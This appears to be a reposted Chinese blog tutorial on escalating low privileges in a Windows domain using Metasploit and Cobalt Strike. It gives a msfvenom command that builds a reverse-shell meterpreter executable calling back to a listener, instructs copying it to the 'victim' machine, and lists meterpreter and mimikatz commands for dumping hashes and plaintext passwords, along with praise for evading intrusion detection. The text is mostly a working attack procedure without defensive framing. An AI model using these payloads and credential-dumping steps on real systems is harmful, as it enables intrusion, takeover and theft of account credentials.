栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > C/C++/C#

2021-09-27 内网域渗透低权限提权(五-3 用metasploit,cobaltstrike来辅助提权)

C/C++/C# 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

2021-09-27 内网域渗透低权限提权(五-3 用metasploit,cobaltstrike来辅助提权)

(๑•⌄•๑)
3借用metasploit,cobaltstrike来辅助提权
ps: Meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。
kali中 打开cmd就在当前文件夹下输入命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.127.129 LPORT=6666 -f exe > 666.exe

得到666.exe文件 将其复制到受害机上(可通过共享文件夹 可参考此链接:https://jingyan.baidu.com/article/aa6a2c141d04a74d4d19c430.html)
ps:reverse_tcp:这是一个基于TCP的反向链接反弹shell, 使用起来很稳定

kali上设置监听 打开受害机的666文件


run后发现还是低权限

提权

得到好几个exp 一个一个试(use加文件名)
background#返回,把meterpreter后台挂起 返回到msf
sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
sesssions -k number #与会话进行交互
run和bgrun# 前台和后台执行以后它选定的 meterpreter 脚本
ps:.mimikatz

meterpreter > load mimikatz #加载mimikatz

meterpreter > msv #获取hash值

meterpreter > kerberos #获取明文

meterpreter >ssp #获取明文信息

meterpreter > wdigest #获取系统账户信息

meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示

meterpreter >mimikatz_command -f hash:: #获取目标 hash

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f sekurlsa::searchPasswords


不断的试 use+漏洞利用名称
第三个试出来了 getuid发现是system权限

cs
cobaltstrike:加插件 图形化利用

通过提权可以得到一个高权限的用户身份 之后可以做很多事情:开启远程桌面 关闭防火墙 抓密码 抓hash。。

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/290087.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号